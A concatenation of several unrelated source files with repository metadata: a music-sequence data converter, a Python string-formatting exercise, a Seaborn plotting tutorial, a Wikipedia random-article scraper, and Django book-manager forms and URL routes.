drum track is ended. Disabled when set to 0 or None.
pitch_classes: A collection of collections, with each sub-collection
containing the set of pitches representing a single class to group by. By
default, groups valid drum pitches into 9 different classes.
add_end_token: Whether or not to add an end token. Recommended to be False
for fixed-length outputs.
steps_per_quarter: The number of quantization steps per quarter note.
quarters_per_bar: The number of quarter notes per bar.
pad_to_total_time: Pads each input/output tensor to the total time of the
NoteSequence.
roll_input: Whether to use a pianoroll-like representation as the input
instead of a one-hot encoding.
roll_output: Whether to use a pianoroll-like representation as the output
instead of a one-hot encoding.
max_tensors_per_notesequence: The maximum number of outputs to return
for each NoteSequence.
presplit_on_time_changes: Whether to split NoteSequence on time changes
before converting.
"""
def __init__(self, max_bars=None, slice_bars=None, gap_bars=1.0,
pitch_classes=None, add_end_token=False, steps_per_quarter=4,
quarters_per_bar=4, pad_to_total_time=False, roll_input=False,
roll_output=False, max_tensors_per_notesequence=5,
presplit_on_time_changes=True):
self._pitch_classes = pitch_classes or REDUCED_DRUM_PITCH_CLASSES
self._pitch_class_map = {
p: i for i, pitches in enumerate(self._pitch_classes) for p in pitches}
self._steps_per_quarter = steps_per_quarter
self._steps_per_bar = steps_per_quarter * quarters_per_bar
self._slice_steps = self._steps_per_bar * slice_bars if slice_bars else None
self._pad_to_total_time = pad_to_total_time
self._roll_input = roll_input
self._roll_output = roll_output
self._drums_extractor_fn = functools.partial(
mm.extract_drum_tracks,
min_bars=1,
gap_bars=gap_bars or float('inf'),
max_steps_truncate=self._steps_per_bar * max_bars if max_bars else None,
pad_end=True)
num_classes = len(self._pitch_classes)
self._pr_encoder_decoder = mm.PianorollEncoderDecoder(
input_size=num_classes + add_end_token)
# Use pitch classes as `drum_type_pitches` since we have already done the
# mapping.
self._oh_encoder_decoder = mm.MultiDrumOneHotEncoding(
drum_type_pitches=[(i,) for i in range(num_classes)])
output_depth = (num_classes if self._roll_output else
self._oh_encoder_decoder.num_classes) + add_end_token
super(DrumsConverter, self).__init__(
input_depth=(
num_classes + 1 if self._roll_input else
self._oh_encoder_decoder.num_classes) + add_end_token,
input_dtype=np.bool,
output_depth=output_depth,
output_dtype=np.bool,
end_token=output_depth - 1 if add_end_token else None,
presplit_on_time_changes=presplit_on_time_changes,
max_tensors_per_notesequence=max_tensors_per_notesequence)
def _to_tensors(self, note_sequence):
"""Converts NoteSequence to unique sequences."""
try:
quantized_sequence = mm.quantize_note_sequence(
note_sequence, self._steps_per_quarter)
if (mm.steps_per_bar_in_quantized_sequence(quantized_sequence) !=
self._steps_per_bar):
return ConverterTensors()
except (mm.BadTimeSignatureException, mm.NonIntegerStepsPerBarException,
            mm.NegativeTimeException):
return ConverterTensors()
new_notes = []
for n in quantized_sequence.notes:
if not n.is_drum:
continue
if n.pitch not in self._pitch_class_map:
continue
n.pitch = self._pitch_class_map[n.pitch]
new_notes.append(n)
del quantized_sequence.notes[:]
quantized_sequence.notes.extend(new_notes)
event_lists, unused_stats = self._drums_extractor_fn(quantized_sequence)
if self._pad_to_total_time:
for e in event_lists:
e.set_length(len(e) + e.start_step, from_left=True)
e.set_length(quantized_sequence.total_quantized_steps)
if self._slice_steps:
sliced_event_tuples = []
for l in event_lists:
for i in range(self._slice_steps, len(l) + 1, self._steps_per_bar):
sliced_event_tuples.append(tuple(l[i - self._slice_steps: i]))
else:
sliced_event_tuples = [tuple(l) for l in event_lists]
unique_event_tuples = list(set(sliced_event_tuples))
unique_event_tuples = self._maybe_sample_outputs(unique_event_tuples)
rolls = []
oh_vecs = []
for t in unique_event_tuples:
if self._roll_input or self._roll_output:
if self.end_token is not None:
t_roll = list(t) + [(self._pr_encoder_decoder.input_size - 1,)]
else:
t_roll = t
rolls.append(np.vstack([
self._pr_encoder_decoder.events_to_input(t_roll, i).astype(np.bool)
for i in range(len(t_roll))]))
if not (self._roll_input and self._roll_output):
labels = [self._oh_encoder_decoder.encode_event(e) for e in t]
if self.end_token is not None:
labels += [self._oh_encoder_decoder.num_classes]
oh_vecs.append(np_onehot(
labels,
self._oh_encoder_decoder.num_classes + (self.end_token is not None),
np.bool))
if self._roll_input:
input_seqs = [
np.append(roll, np.expand_dims(np.all(roll == 0, axis=1), axis=1),
axis=1) for roll in rolls]
else:
input_seqs = oh_vecs
output_seqs = rolls if self._roll_output else oh_vecs
return ConverterTensors(inputs=input_seqs, outputs=output_seqs)
def _to_notesequences(self, samples):
output_sequences = []
for s in samples:
if self._roll_output:
if self.end_token is not None:
end_i = np.where(s[:, self.end_token])
if len(end_i): # pylint: disable=g-explicit-length-test
s = s[:end_i[0]]
events_list = [frozenset(np.where(e)[0]) for e in s]
else:
s = np.argmax(s, axis=-1)
if self.end_token is not None and self.end_token in s:
s = s[:s.tolist().index(self.end_token)]
events_list = [self._oh_encoder_decoder.decode_event(e) for e in s]
# Map classes to exemplars.
events_list = [
frozenset(self._pitch_classes[c][0] for c in e) for e in events_list]
track = mm.DrumTrack(
events=events_list, steps_per_bar=self._steps_per_bar,
steps_per_quarter=self._steps_per_quarter)
output_sequences.append(track.to_sequence(velocity=80))
return output_sequences
class TrioConverter(BaseNoteSequenceConverter):
"""Converts to/from 3-part (mel, drums, bass) multi-one-hot events.
Extracts overlapping segments with melody, drums, and bass (determined by
program number) and concatenates one-hot tensors from OneHotMelodyConverter
and OneHotDrumsConverter. Takes the cross products from the sets of
instruments of each type.
Args:
slice_bars: Optional size of window to slide over full converted tensor.
gap_bars: The number of consecutive empty bars to allow for any given
instrument. Note that this number is effectively doubled for internal
gaps.
max_bars: Optional maximum number of bars per extracted sequence, before
slicing.
steps_per_quarter: The number of quantization steps per quarter note.
quarters_per_bar: The number of quarter notes per bar.
max_tensors_per_notesequence: The maximum number of outputs to return
for each NoteSequence.
"""
class InstrumentType(object):
UNK = 0
MEL = 1
BASS = 2
DRUMS = 3
INVALID = 4
def __init__(
self, slice_bars=None, gap_bars=2, max_bars=1024, steps_per_quarter=4,
quarters_per_bar=4, max_tensors_per_notesequence=5):
self._melody_converter = OneHotMelodyConverter(
gap_bars=None, steps_per_quarter=steps_per_quarter,
pad_to_total_time=True, presplit_on_time_changes=False,
max_tensors_per_notesequence=None)
self._drums_converter = DrumsConverter(
gap_bars=None, steps_per_quarter=steps_per_quarter,
pad_to_total_time=True, presplit_on_time_changes=False,
max_tensors_per_notesequence=None)
self._slice_bars = slice_bars
self._gap_bars = gap_bars
self._max_bars = max_bars
self._steps_per_quarter = steps_per_quarter
self._steps_per_bar = steps_per_quarter * quarters_per_bar
self._split_output_depths = (
self._melody_converter.output_depth,
self._melody_converter.output_depth,
self._drums_converter.output_depth)
output_depth = sum(self._split_output_depths)
self._program_map = dict(
[(i, TrioConverter.InstrumentType.MEL) for i in MEL_PROGRAMS] +
[(i, TrioConverter.InstrumentType.BASS) for i in BASS_PROGRAMS])
super(TrioConverter, self).__init__(
input_depth=output_depth,
input_dtype=np.bool,
output_depth=output_depth,
output_dtype=np.bool,
end_token=False,
presplit_on_time_changes=True,
max_tensors_per_notesequence=max_tensors_per_notesequence)
def _to_tensors(self, note_sequence):
try:
quantized_sequence = mm.quantize_note_sequence(
note_sequence, self._steps_per_quarter)
if (mm.steps_per_bar_in_quantized_sequence(quantized_sequence) !=
self._steps_per_bar):
return ConverterTensors()
except (mm.BadTimeSignatureException, mm.NonIntegerStepsPerBarException,
mm.NegativeTimeException):
return ConverterTensors()
total_bars = int(
np.ceil(quantized_sequence.total_quantized_steps / self._steps_per_bar))
total_bars = min(total_bars, self._max_bars)
# Assign an instrument class for each instrument, and compute its coverage.
# If an instrument has multiple classes, it is considered INVALID.
instrument_type = np.zeros(MAX_INSTRUMENT_NUMBER + 1, np.uint8)
coverage = np.zeros((total_bars, MAX_INSTRUMENT_NUMBER + 1), np.bool)
for note in quantized_sequence.notes:
i = note.instrument
if i > MAX_INSTRUMENT_NUMBER:
tf.logging.warning('Skipping invalid instrument number: %d', i)
continue
inferred_type = (
self.InstrumentType.DRUMS if note.is_drum else
self._program_map.get(note.program, self.InstrumentType.INVALID))
if not instrument_type[i]:
instrument_type[i] = inferred_type
elif instrument_type[i] != inferred_type:
instrument_type[i] = self.InstrumentType.INVALID
start_bar = note.quantized_start_step // self._steps_per_bar
end_bar = int(np.ceil(note.quantized_end_step / self._steps_per_bar))
if start_bar >= total_bars:
continue
coverage[start_bar:min(end_bar, total_bars), i] = True
# Group instruments by type.
instruments_by_type = collections.defaultdict(list)
for i, type_ in enumerate(instrument_type):
if type_ not in (self.InstrumentType.UNK, self.InstrumentType.INVALID):
instruments_by_type[type_].append(i)
if len(instruments_by_type) < 3:
# This NoteSequence doesn't have all 3 types.
return ConverterTensors()
# Encode individual instruments.
# Set total time so that instruments will be padded correctly.
note_sequence.total_time = (
total_bars * self._steps_per_bar *
60 / note_sequence.tempos[0].qpm / self._steps_per_quarter)
encoded_instruments = {}
for i in (instruments_by_type[self.InstrumentType.MEL] +
instruments_by_type[self.InstrumentType.BASS]):
tensors = self._melody_converter.to_tensors(
_extract_instrument(note_sequence, i))
if tensors.outputs:
encoded_instruments[i] = tensors.outputs[0]
else:
coverage[:, i] = False
for i in instruments_by_type[self.InstrumentType.DRUMS]:
tensors = self._drums_converter.to_tensors(
_extract_instrument(note_sequence, i))
if tensors.outputs:
encoded_instruments[i] = tensors.outputs[0]
else:
coverage[:, i] = False
# Fill in coverage gaps up to self._gap_bars.
og_coverage = coverage.copy()
for j in range(total_bars):
coverage[j] = np.any(
og_coverage[
max(0, j-self._gap_bars):min(total_bars, j+self._gap_bars) + 1],
axis=0)
# Take cross product of instruments from each class and compute combined
# encodings where they overlap.
seqs = []
for grp in itertools.product(
instruments_by_type[self.InstrumentType.MEL],
instruments_by_type[self.InstrumentType.BASS],
instruments_by_type[self.InstrumentType.DRUMS]):
# Consider an instrument covered within gap_bars from the end if any of
# the other instruments are. This allows more leniency when re-encoding
# slices.
grp_coverage = np.all(coverage[:, grp], axis=1)
grp_coverage[:self._gap_bars] = np.any(coverage[:self._gap_bars, grp])
grp_coverage[-self._gap_bars:] = np.any(coverage[-self._gap_bars:, grp])
for j in range(total_bars - self._slice_bars + 1):
if np.all(grp_coverage[j:j + self._slice_bars]):
start_step = j * self._steps_per_bar
end_step = (j + self._slice_bars) * self._steps_per_bar
seqs.append(np.concatenate(
[encoded_instruments[i][start_step:end_step] for i in grp],
axis=-1))
return ConverterTensors(inputs=seqs, outputs=seqs)
def _to_notesequences(self, samples):
output_sequences = []
dim_ranges = np.cumsum(self._split_output_depths)
for s in samples:
mel_ns = self._melody_converter.to_notesequences(
[s[:, :dim_ranges[0]]])[0]
bass_ns = self._melody_converter.to_notesequences(
[s[:, dim_ranges[0]:dim_ranges[1]]])[0]
drums_ns = self._drums_converter.to_notesequences(
[s[:, dim_ranges[1]:]])[0]
for n in bass_ns.notes:
n.instrument = 1
n.program = ELECTRIC_BASS_PROGRAM
for n in drums_ns.notes:
n.instrument = 9
ns = mel_ns
ns.notes.extend(bass_ns.notes)
ns.notes.extend(drums_ns.notes)
ns.total_time = max(
mel_ns.total_time, bass_ns.total_time, drums_ns.total_time)
output_sequences.append(ns)
return output_sequences
def count_examples(examples_path, data_converter,
file_reader=tf.python_io.tf_record_iterator):
"""Counts the number of examples produced by the converter from files."""
filenames = tf.gfile.Glob(examples_path)
num_examples = 0
for f in filenames:
tf.logging.info('Counting examples in %s.', f)
reader = file_reader(f)
for item_str in reader:
item = data_converter.str_to_item_fn(item_str)
tensors = data_converter.to_tensors(item)
num_examples += len(tensors.inputs)
tf.logging.info('Total examples: %d', num_examples)
return num_examples
def get_dataset(
config,
num_threads=1,
tf_file_reader=tf.data.TFRecordDataset,
prefetch_size=4,
is_training=False):
"""Get input tensors from dataset for training or evaluation.
Args:
config: A Config object containing dataset information.
num_threads: The number of threads to use for pre-processing.
tf_file_reader: The tf.data.Dataset class to use for reading files.
prefetch_size: The number of batches to prefetch. Disabled when 0.
is_training: Whether or not the dataset is used in training. Determines
whether dataset is shuffled and repeated, etc.
Returns:
A tf.data.Dataset containing input, output, control, and length tensors.
"""
batch_size = config.hparams.batch_size
examples_path = (
config.train_examples_path if is_training else config.eval_examples_path)
note_sequence_augmenter = (
config.note_sequence_augmenter if is_training else None)
data_converter = config.data_converter
data_converter.is_training = is_training
tf.logging.info('Reading examples from: %s', examples_path)
num_files = len(tf.gfile.Glob(examples_path))
files = tf.data.Dataset.list_files(examples_path)
if is_training:
files = files.apply(
tf.contrib.data.shuffle_and_repeat(buffer_size=num_files))
reader = files.apply(
tf.contrib.data.parallel_interleave(
tf_file_reader,
cycle_length=num_threads,
sloppy=True))
def _remove_pad_fn(padded_seq_1, padded_seq_2, padded_seq_3, length):
if length.shape.ndims == 0:
return (padded_seq_1[0:length], padded_seq_2[0:length],
padded_seq_3[0:length], length)
else:
# Don't remove padding for hierarchical examples.
return padded_seq_1, padded_seq_2, padded_seq_3, length
dataset = reader
if note_sequence_augmenter is not None:
dataset = dataset.map(note_sequence_augmenter.tf_augment)
dataset = (dataset
.map(data_converter.tf_to_tensors,
num_parallel_calls=num_threads)
.flat_map(lambda *t: tf.data.Dataset.from_tensor_slices(t))
.map(_remove_pad_fn))
if is_training:
dataset = dataset.shuffle(buffer_size=batch_size * 4)
dataset = dataset.padded_batch(batch_size, dataset.output_shapes)
if prefetch_size:
dataset = dataset.prefetch(prefetch_size)
return dataset
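# A minimal usage sketch (editor's addition): `config` is assumed to be a
# Config object of the shape described in the get_dataset docstring above;
# it is not defined in this fragment.
def _example_usage(config):
  dataset = get_dataset(config, num_threads=4, is_training=True)
  iterator = dataset.make_one_shot_iterator()  # TF 1.x tf.data iterator API
  # Each element is (inputs, outputs, controls, lengths), padded as above.
  return iterator.get_next()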
|
[
"noreply@github.com"
] |
SeanHsieh.noreply@github.com
|
87eb5b823f9ba9b24000e7cc2baa16e31afd600b
|
3f34ecc7d4e9fef6d3ab3b2114fe5f1431744ae8
|
/mypy/3/3.5.str_fromat.py
|
be0240d0760a2338f4bffbce59da625d8c19605c
|
[] |
no_license
|
wcybxzj/learing_dive_into_python
|
386101f4674b2e6d4b176cc4109b95b98c3024b7
|
40c456eb2afe4de421bb7e9fedd4f9401b4213a6
|
refs/heads/master
| 2021-01-10T01:01:42.361133
| 2015-02-07T14:48:23
| 2015-02-07T14:48:23
| 29,670,309
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 471
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
uid ="sa"
pwd = "secret"
# The two forms below produce identical output
print pwd +' is password '+ uid
print '%s is password %s' % (pwd, uid)
userCount = 6
print "User connected:%d" % (userCount)
try:
print "User connected" + userCount
except TypeError:
print 'int cant connect with str'
# Formatting numeric values
print "Today's stock price:%f" % 50.4625
print "Today's stock price:%.2f" % 50.4625
print "Today's stock price:%+.2f" % 1.5
|
[
"virgo86ybx@gmail.com"
] |
virgo86ybx@gmail.com
|
6ca28a1331aa11b8585b3149fa132846aa5c8bcc
|
da2d6c22dd1b389175ad303a729ff1f2a82ba9a8
|
/Seaborn/Seaborn.py
|
680c9d2ba8d68112331870bf2b384eaa30a2dcbe
|
[] |
no_license
|
hmtalha786/Data-Science
|
05019dc2e3745899ecfad40deec0e039b779a914
|
b322fc42a7babd29947f7bea049bb0dcf4c2bc19
|
refs/heads/master
| 2023-03-22T04:12:15.364694
| 2021-03-13T17:28:59
| 2021-03-13T17:28:59
| 335,062,509
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,866
|
py
|
#!/usr/bin/env python
# coding: utf-8
# # Seaborn Tutorial
# ### Imports
# In[ ]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# In[ ]:
get_ipython().run_line_magic('matplotlib', 'inline')
# In[ ]:
# Auto reloads notebook when changes are made
get_ipython().run_line_magic('reload_ext', 'autoreload')
get_ipython().run_line_magic('autoreload', '2')
# ### Import Data
# In[ ]:
# You can import custom data
cs_df = pd.read_csv('ComputerSales.csv')
# In[ ]:
# Seaborn provides built in datasets
print(sns.get_dataset_names())
# In[ ]:
# Load a built in dataset based on US State car crash percentages
crash_df = sns.load_dataset('car_crashes')
# # Distribution Plots
# ### Distribution Plot
# In[ ]:
# Provides a way to look at a univariate distribution.
# A univariate distribution provides a distribution for one variable
# Kernel Density Estimation with a Histogram is provided
# kde=False removes the KDE
# Bins define how many buckets to divide the data up into between intervals
# For example put all profits between $10 and $20 in this bucket
sns.distplot(crash_df['not_distracted'], kde=False, bins=25)
# ### Joint Plot
# In[ ]:
# Jointplot compares 2 distributions and plots a scatter plot by default
# As we can see as people tend to speed they also tend to drink & drive
# With kind you can create a regression line with kind='reg'
# You can create a 2D KDE with kind='kde'
# Kernel Density Estimation estimates the distribution of data
# You can create a hexagon distribution with kind='hex'
sns.jointplot(x='speeding', y='alcohol', data=crash_df, kind='reg')
# ### KDE Plot
# In[ ]:
# Get just the KDE plot
sns.kdeplot(crash_df['alcohol'])
# ### Pair Plots
# In[ ]:
# Pair Plot plots relationships across the entire data frames numerical values
sns.pairplot(crash_df)
# Load data on tips
tips_df = sns.load_dataset('tips')
# With hue you can pass in a categorical column and the charts will be colorized
# You can use color maps from Matplotlib to define what colors to use
# sns.pairplot(tips_df, hue='sex', palette='Blues')
# ### Rug Plots
# In[ ]:
# Plots a single column of datapoints in an array as sticks on an axis
# With a rug plot you'll see a denser cluster of lines where values are
# most common, just as a histogram is taller where values are more common
sns.rugplot(tips_df['tip'])
# ### Styling
# In[ ]:
# You can set styling for your axes and grids
# white, darkgrid, whitegrid, dark, ticks
sns.set_style('white')
# In[ ]:
# You can use figure sizing from Matplotlib
plt.figure(figsize=(8,4))
# In[ ]:
# Change size of lables, lines and other elements to best fit
# how you will present your data (paper, talk, poster)
sns.set_context('paper', font_scale=1.4)
# In[ ]:
sns.jointplot(x='speeding', y='alcohol', data=crash_df, kind='reg')
# In[ ]:
# Get rid of spines
# You can turn off specific spines with right=True, left=True
# bottom=True, top=True
sns.despine(left=False, bottom=False)
# # Categorical Plots
# ### Bar Plots
# In[ ]:
# Focus on distributions using categorical data in reference to one of the numerical
# columns
# Aggregate categorical data based on a function (mean is the default)
# Estimate total bill amount based on sex
# With estimator you can define functions to use other than the mean like those
# provided by NumPy: median, std, var, cov, or make your own functions
sns.barplot(x='sex',y='total_bill',data=tips_df, estimator=np.median)
# ### Count Plot
# In[ ]:
# A count plot is like a bar plot, but the estimator is counting
# the number of occurrences
sns.countplot(x='sex',data=tips_df)
# ### Box Plot
# In[ ]:
plt.figure(figsize=(14,9))
sns.set_style('darkgrid')
# A box plot allows you to compare different variables
# The box shows the quartiles of the data and the bar in the middle is the median
# The whiskers extend to 1.5x the interquartile range beyond the box, and
# points beyond the whiskers are considered outliers
# Hue can add another category being sex
# For example, we see men spend far more than women on Friday
sns.boxplot(x='day',y='total_bill',data=tips_df, hue='sex')
# Moves legend to the best position
plt.legend(loc=0)
# ### Violin Plot
# In[ ]:
# Violin Plot is a combination of the boxplot and KDE
# While a box plot corresponds to data points, the violin plot uses the KDE estimation
# of the data points
# Split allows you to compare how the categories compare to each other
sns.violinplot(x='day',y='total_bill',data=tips_df, hue='sex',split=True)
# ### Strip Plot
# In[ ]:
plt.figure(figsize=(8,5))
# The strip plot draws a scatter plot representing all data points where one
# variable is categorical. It is often used to show all observations with
# a box plot that represents the average distribution
# Jitter spreads data points out so that they aren't stacked on top of each other
# Hue breaks data into men and women
# Dodge separates the men and women data
sns.stripplot(x='day',y='total_bill',data=tips_df, jitter=True,
hue='sex', dodge=True)
# ### Swarm Plot
# In[ ]:
# A swarm plot is like a strip plot, but points are adjusted so they don't overlap
# It looks like a combination of the violin and strip plots
# sns.swarmplot(x='day',y='total_bill',data=tips_df)
# In[ ]:
# You can stack a violin plot with a swarm
sns.violinplot(x='day',y='total_bill',data=tips_df)
sns.swarmplot(x='day',y='total_bill',data=tips_df, color='white')
# ### Palettes
# In[ ]:
plt.figure(figsize=(8,6))
sns.set_style('dark')
sns.set_context('talk')
# In[ ]:
# You can use Matplotlibs color maps for color styling
# https://matplotlib.org/3.3.1/tutorials/colors/colormaps.html
sns.stripplot(x='day',y='total_bill',data=tips_df, hue='sex', palette='seismic')
# In[ ]:
# Add the optional legend with a location number (best: 0,
# upper right: 1, upper left: 2, lower left: 3, lower right: 4,
# https://matplotlib.org/3.3.1/api/_as_gen/matplotlib.pyplot.legend.html)
# or supply a tuple of x & y from lower left
plt.legend(loc=0)
# # Matrix Plots
# ### Heatmaps
# In[ ]:
plt.figure(figsize=(8,6))
sns.set_context('paper', font_scale=1.4)
# To create a heatmap with data you must have data set up as a matrix where variables are on the columns and rows
# In[ ]:
# Correlation tells you how influential a variable is on the result
# So we see that no_previous (no prior accident) is heavily correlated with accidents, while the insurance premium is not
crash_mx = crash_df.corr()
# In[ ]:
# Create the heatmap, add annotations and a color map
sns.heatmap(crash_mx, annot=True, cmap='Blues')
# In[ ]:
plt.figure(figsize=(8,6))
sns.set_context('paper', font_scale=1.4)
# In[ ]:
# We can create a matrix with an index of month, columns representing years
# and the number of passengers for each
# We see that flights have increased over time and that most people travel in
# July and August
flights = sns.load_dataset("flights")
flights = flights.pivot_table(index='month', columns='year', values='passengers')
# In[ ]:
# You can separate data with lines
sns.heatmap(flights, cmap='Blues', linecolor='white', linewidth=1)
# ### Cluster Map
# In[ ]:
plt.figure(figsize=(8,6))
sns.set_context('paper', font_scale=1.4)
# In[ ]:
# A Cluster map is a hierarchically clustered heatmap
# The distance between points is calculated, the closest are joined, and this
# continues for the next closest (It compares columns / rows of the heatmap)
# This is data on iris flowers with data on petal lengths
iris = sns.load_dataset("iris")
# Return values for species
# species = iris.pop("species")
# sns.clustermap(iris)
# In[ ]:
# With our flights data we can see that years have been reoriented to place
# like data closer together
# You can see clusters of data for July & August for the years 59 & 60
# standard_scale normalizes the data to focus on the clustering
sns.clustermap(flights,cmap="Blues", standard_scale=1)
# ### PairGrid
# In[ ]:
plt.figure(figsize=(8,6))
sns.set_context('paper', font_scale=1.4)
# In[ ]:
# You can create a grid of different plots with complete control over what is displayed
# Create the empty grid system using the provided data
# Colorize based on species
# iris_g = sns.PairGrid(iris, hue="species")
# In[ ]:
# Put a scatter plot across the upper, lower and diagonal
# iris_g.map(plt.scatter)
# In[ ]:
# Put a histogram on the diagonal
# iris_g.map_diag(plt.hist)
# And a scatter plot every place else
# iris_g.map_offdiag(plt.scatter)
# In[ ]:
# Have different plots in upper, lower and diagonal
# iris_g.map_upper(plt.scatter)
# iris_g.map_lower(sns.kdeplot)
# In[ ]:
# You can define variables for x & y for a custom grid
iris_g = sns.PairGrid(iris, hue="species",
x_vars=["sepal_length", "sepal_width"],
y_vars=["petal_length", "petal_width"])
iris_g.map(plt.scatter)
# In[ ]:
# Add a legend last
iris_g.add_legend()
# ### Facet Grid
# In[ ]:
# Can also print multiple plots in a grid in which you define columns & rows
# Get histogram for smokers and non with total bill for lunch & dinner
tips_fg = sns.FacetGrid(tips_df, col='time', row='smoker')
# In[ ]:
# You can pass in attributes for the histogram
tips_fg.map(plt.hist, "total_bill", bins=8)
# In[ ]:
# Create a scatter plot with data on total bill & tip (You need two parameters)
tips_fg.map(plt.scatter, "total_bill", "tip")
# In[ ]:
# We can assign variables to different colors and increase size of grid
# Aspect is 1.3 x the size of height
# You can change the order of the columns
# Define the palette used
tips_fg = sns.FacetGrid(tips_df, col='time', hue='smoker', height=4, aspect=1.3,
col_order=['Dinner', 'Lunch'], palette='Set1')
tips_fg.map(plt.scatter, "total_bill", "tip", edgecolor='w')
# In[ ]:
# Define size, linewidth and assign a color of white to markers
kws = dict(s=50, linewidth=.5, edgecolor="w")
# Define that we want to assign different markers to smokers and non
tips_fg = sns.FacetGrid(tips_df, col='sex', hue='smoker', height=4, aspect=1.3,
hue_order=['Yes','No'],
hue_kws=dict(marker=['^', 'v']))
tips_fg.map(plt.scatter, "total_bill", "tip", **kws)
tips_fg.add_legend()
# In[ ]:
# This dataframe provides scores for different students based on the level
# of attention they could provide during testing
att_df = sns.load_dataset("attention")
# In[ ]:
# Put each person in their own plot with 5 per line and plot their scores
att_fg = sns.FacetGrid(att_df, col='subject', col_wrap=5, height=1.5)
att_fg.map(plt.plot, 'solutions', 'score', marker='.')
# ### Regression Plots
# In[ ]:
# lmplot combines regression plots with facet grid
tips_df = sns.load_dataset('tips')
tips_df.head()
# In[ ]:
plt.figure(figsize=(8,6))
sns.set_context('paper', font_scale=1.4)
plt.figure(figsize=(8,6))
# We can plot a regression plot studying whether total bill affects the tip
# hue is used to show separation based off of categorical data
# We see that males tend to tip slightly more
# Define different markers for men and women
# You can effect the scatter plot by passing in a dictionary for styling of markers
sns.lmplot(x='total_bill', y='tip', hue='sex', data=tips_df, markers=['o', '^'],
scatter_kws={'s': 100, 'linewidth': 0.5, 'edgecolor': 'w'})
# In[ ]:
# You can separate the data into separate columns for day data
# sns.lmplot(x='total_bill', y='tip', col='sex', row='time', data=tips_df)
tips_df.head()
# Makes the fonts more readable
sns.set_context('poster', font_scale=1.4)
sns.lmplot(x='total_bill', y='tip', data=tips_df, col='day', hue='sex',
height=8, aspect=0.6)
|
[
"talhaofficialwork@gmail.com"
] |
talhaofficialwork@gmail.com
|
094285e188cc74e8c610f2daa584348e0873f7ca
|
6237a4d717a7055c9b0f1de3204554cbf5069b62
|
/UserLog/urls.py
|
4457c41a32857ba13cffcc92a2bd40f237eea06e
|
[] |
no_license
|
sylvia198591/BookProject
|
180b9072c13cad5a5f996d60946caab78ae503b1
|
eabfb6cfe63e45f7f73c1500bad6aa8d3a1c62fb
|
refs/heads/master
| 2023-03-27T00:25:10.827236
| 2021-03-22T08:43:49
| 2021-03-22T08:43:49
| 350,118,352
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 291
|
py
|
from django.urls import path
from UserLog.views import ExampleView, CustomAuthToken
urlpatterns = [
path('api/users/',ExampleView.as_view()),
path('api/token/auth/', CustomAuthToken.as_view()),
]
|
[
"sylvia.anitha@gmail.com"
] |
sylvia.anitha@gmail.com
|
1e189f1ce03846ffe4d1f30d329b5694e3540608
|
ecdb99b66c3f40a66c7123b8f8ac8e1f2772c8da
|
/random_request.py
|
112757d9569c0e17f92bd403ddb01e0e7927486a
|
[] |
no_license
|
kannanenator/haikus-from-wikipedia
|
ef8168e310bb8190a6b457c5d2f4be09db21bc6f
|
a404033fcd8f4850e150b0a820d8be4974cd6eb4
|
refs/heads/master
| 2020-04-05T23:09:27.083860
| 2019-11-04T00:05:19
| 2019-11-04T00:05:19
| 57,425,787
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 774
|
py
|
import requests
from bs4 import BeautifulSoup
import sys
# runs on python 3.5
def request_random():
'''Request random wikipedia article, return html_doc'''
r = requests.get('https://en.wikipedia.org/wiki/Special:Random')
return r.content, r.url
def parse_article(article):
'''parse html and get relevant (main paragraph) text out the article'''
soup = BeautifulSoup(article, 'html.parser')
paragraphs = soup.find_all("p")
ps = (" ").join([elem.text for elem in paragraphs])
title = soup.find("h1", id="firstHeading").text
return ps, title
def get_random_text():
'''puts the full request together'''
html_doc, url = request_random()
parsed, title = parse_article(html_doc)
return parsed, title, url
if __name__ == "__main__":
print(get_random_text())
|
[
"kannanenator.gmail.com"
] |
kannanenator.gmail.com
|
1140e573f0619909625e7218b1ff94f7d6402bec
|
dc849231858f6a1378c8fb52e81035d20e48e321
|
/Lab3/实验代码/2/bookmanager/forms.py
|
2d4e7e98b82012568e11fb05f6f64edd4ae53506
|
[] |
no_license
|
Fooo0/Software-Engineering
|
05413854f9ee54b14034bcb0f182643b2fb985de
|
47c65bc7b291352ea590ea168bf30a32b1e25363
|
refs/heads/master
| 2021-01-10T17:20:59.748108
| 2016-02-20T14:35:52
| 2016-02-20T14:35:52
| 52,155,632
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,662
|
py
|
# -*- coding: utf-8 -*-
from django import forms
from bookmanager.models import Book, Author
class Form_Book_new(forms.ModelForm):
class Meta:
model = Book
fields = ('Title','AuthorID','Publisher',
'PublishDate', 'Price')
error_messages = {
'Title': {'required' : '请填写书名'},
'AuthorID' : {'required' : '请填写作者ID'},
'Publisher' : {'required' : '请填写出版社'},
'Price' : {'required' : '请填写价格'},
}
def __init__(self, *args, **kwargs):
super(Form_Book_new, self).__init__(*args, **kwargs)
self.fields['PublishDate'].widget = forms.TextInput(attrs={
'placeholder': "格式举例:1995-05-28"})
class Form_Book_update(forms.ModelForm):
class Meta:
model = Book
fields = ('AuthorID','Publisher',
'PublishDate', 'Price')
error_messages = {
'AuthorID' : {'required' : '请填写作者ID'},
'Publisher' : {'required' : '请填写出版社'},
'Price' : {'required' : '请填写价格'},
}
def __init__(self, *args, **kwargs):
super(Form_Book_update, self).__init__(*args, **kwargs)
self.fields['PublishDate'].widget = forms.TextInput(attrs={
'placeholder': "格式举例:1995-05-28"})
class Form_Author(forms.ModelForm):
class Meta:
model = Author
fields = ('Name','Age','Country',)
error_messages = {
'Name': {'required' : '请填写作者姓名',},
'Country' : {'required' : '请填写作者国别',},
}
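# Editor's sketch of typical usage in a view (not part of the original file);
# the template name and the 'book_list' URL name are assumptions.
def new_book_view(request):
    from django.shortcuts import render, redirect
    if request.method == 'POST':
        form = Form_Book_new(request.POST)
        if form.is_valid():
            form.save()
            return redirect('book_list')
    else:
        form = Form_Book_new()
    return render(request, 'book_new.html', {'form': form})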
|
[
"xiao-fei-fei@qq.com"
] |
xiao-fei-fei@qq.com
|
706672dfd171b2790a1fdce2493d5e185f065859
|
35831bbf46ee61be24a27983deaafe0247b0d141
|
/2-body-sim.py
|
8a0e9f7a8a8c937a1352b14fe2bce9da5acfeb30
|
[] |
no_license
|
austinpower1258/3-Body-Problem
|
